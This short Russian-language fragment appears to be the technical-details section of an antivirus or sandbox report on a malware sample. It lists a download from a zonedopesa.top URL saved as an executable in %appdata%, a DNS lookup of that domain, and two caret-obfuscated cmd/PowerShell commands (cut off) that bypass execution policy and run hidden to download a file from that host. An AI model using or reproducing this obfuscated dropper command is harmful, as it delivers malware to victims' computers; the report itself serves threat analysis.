Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^WErsHelL.^EXe^ -Ex^ec^UTI^o^N^p^OLic^Y^ bypa^Ss ^-No^PRo^FIlE -^wiN^DoWSTy^LE Hid^d^En^ ^(neW-Ob^jEC^t^ SY^Stem^.^NeT.wEBC^lie^Nt^).^do^WN^LO^a^d^FI^L^e('http://www.zonedopesa.t...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "PO^WErsHelL.^EXe^ -Ex^ec^UTI^o^N^p^OLic^Y^ bypa^Ss ^-No^PRo^FIlE -^wiN^DoWSTy^LE Hid^d^En^ ^(neW-Ob^jEC^t^ SY^Stem^.^NeT.wEBC^lie^Nt^).^do^WN^LO^a^d^FI^L^e('http://www.zonedopesa.t...' (со скрытым окном)